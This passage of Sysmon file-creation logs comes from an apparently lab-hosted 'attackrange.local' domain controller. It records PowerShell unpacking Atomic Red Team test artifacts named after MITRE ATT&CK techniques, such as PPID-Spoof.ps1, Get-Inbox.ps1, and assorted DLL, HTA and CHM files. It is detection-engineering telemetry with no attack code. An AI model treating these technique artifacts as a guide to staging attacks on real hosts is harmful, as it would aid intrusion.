05:52:33.687","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1114.001\\src\\Get-Inbox.ps1","CreationUtcTime":"2020-08-01 05:52:33.687","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.702\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1127.001\\src\\T1127.001.csproj\r\nCreationUtcTime: 2020-08-01 05:52:33.702","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.702","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1127.001\\src\\T1127.001.csproj","CreationUtcTime":"2020-08-01 05:52:33.702","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4737,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.718\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\bin\\calc.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.718","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.718","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\bin\\calc.dll","CreationUtcTime":"2020-08-01 05:52:33.718","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4738,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.718\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\src\\PPID-Spoof.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.718","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.718","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\src\\PPID-Spoof.ps1","CreationUtcTime":"2020-08-01 05:52:33.718","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4739,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.796\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.001\\src\\T1218.001.chm\r\nCreationUtcTime: 2020-08-01 05:52:33.796","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.796","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.001\\src\\T1218.001.chm","CreationUtcTime":"2020-08-01 05:52:33.796","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.812\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.004\\src\\InstallUtilTestHarness.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.812","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.812","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.004\\src\\InstallUtilTestHarness.ps1","CreationUtcTime":"2020-08-01 05:52:33.812","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.827\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\T1218.005.hta\r\nCreationUtcTime: 2020-08-01 05:52:33.827","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.827","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\T1218.005.hta","CreationUtcTime":"2020-08-01 05:52:33.827","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.827\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\powershell.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.827","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.827","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\powershell.ps1","CreationUtcTime":"2020-08-01 05:52:33.827","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.859\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.007\\src\\x64\\T1218.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.859","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.859","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.007\\src\\x64\\T1218.dll","CreationUtcTime":"2020-08-01 05:52:33.859","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.859\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.008\\src\\Win32\\T1218-2.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.859","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.859","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.008\\src\\Win32\\T1218-2.dll","CreationUtcTime":"2020-08-01 05:52:33.859","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.874\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx64.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.874","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.874","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx64.dll","CreationUtcTime":"2020-08-01 05:52:33.874","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.874\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx86.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.874","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.874","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx86.dll","CreationUtcTime":"2020-08-01 05:52:33.874","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.905\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.905","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.905","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","CreationUtcTime":"2020-08-01 05:52:33.905","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.921\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.921","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.921","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218.dll","CreationUtcTime":"2020-08-01 05:52:33.921","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.921\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\x64\\T1218.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.921","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.921","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\x64\\T1218.dll","CreationUtcTime":"2020-08-01 05:52:33.921","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:34.015\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1543.003\\bin\\AtomicService.exe\r\nCreationUtcTime: 2020-08-01 05:52:34.015","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:34.015","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1543.003\\bin\\AtomicService.exe","CreationUtcTime":"2020-08-01 05:52:34.015","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:34.062\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010.dll\r\nCreationUtcTime: 2020-08-01 05:52:34.062","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:34.062","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010.dll","CreationUtcTime":"2020-08-01 05:52:34.062","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:34.062\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010x86.dll\r\nCreationUtcTime: 2020-08-01 05:52:34.062","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:34.062","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010x86.dll","CreationUtcTime":"2020-08-01 05:52:34.062","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:34.077\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.dll\r\nCreationUtcTime: 2020-08-01 05:52:34.077","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:34.077","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.dll","CreationUtcTime":"2020-08-01 05:52:34.077","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:34.077\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.exe\r\nCreationUtcTime: 2020-08-01 